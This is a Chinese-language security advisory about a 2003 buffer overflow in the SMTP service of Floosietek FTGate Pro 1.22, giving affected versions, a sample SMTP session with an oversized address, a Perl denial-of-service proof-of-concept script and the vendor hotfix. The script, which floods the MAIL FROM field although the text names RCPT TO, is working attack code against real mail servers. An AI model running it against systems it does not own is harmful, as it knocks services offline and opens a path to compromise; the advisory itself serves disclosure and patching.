安全研究
安全漏洞
Floosietek FTGate PRO SMTP RCPT TO远程缓冲区溢出漏洞
发布日期:2003-05-06
更新日期:2003-05-12
受影响系统:
Floosietek FTGatePro 1.22 (1328)不受影响系统:
Floosietek FTGatePro 1.22 (1330)描述:
BUGTRAQ ID: 7508
FTGatePro是一款网络共享代理服务程序,支持多种协议。
FTGatePro邮件服务程序对超长SMTP 'RCPT TO'命令参数缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以SYSTEM用户权限在系统上执行任意指令。
当恶意攻击攻击者发送"RCPT TO"字段中包含超长字符串的邮件给FTGatePro邮件服务程序时,会发生缓冲区溢出,如果精心构建提交字符串,可能以SYSTEM权限在系统上执行任意指令。
<*来源:Dennis Rand (DER@cowi.dk)
链接:http://www.infowarfare.dk/Advisories/iw-16-advisory.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again ending with ".com"]
<connection closed>
#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP Server FTGate, causing the service to stop responding for a short
# Period, where we can actually overwrite the exception handler on the stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Solution:
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
#
#
use IO::Socket;
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "a" x 2400;
my $sock = IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}
print $sock "HELO $target\r\n";
$resp = <$sock>;
print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
建议:
厂商补丁:
Floosietek
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载安装HOTFIX 1330补丁,升级到FTGate Pro Mail Server v. 1.22:
http://www.ftgate.com/
浏览次数:3665
严重程度:0(网友投票)
绿盟科技给您安全的保障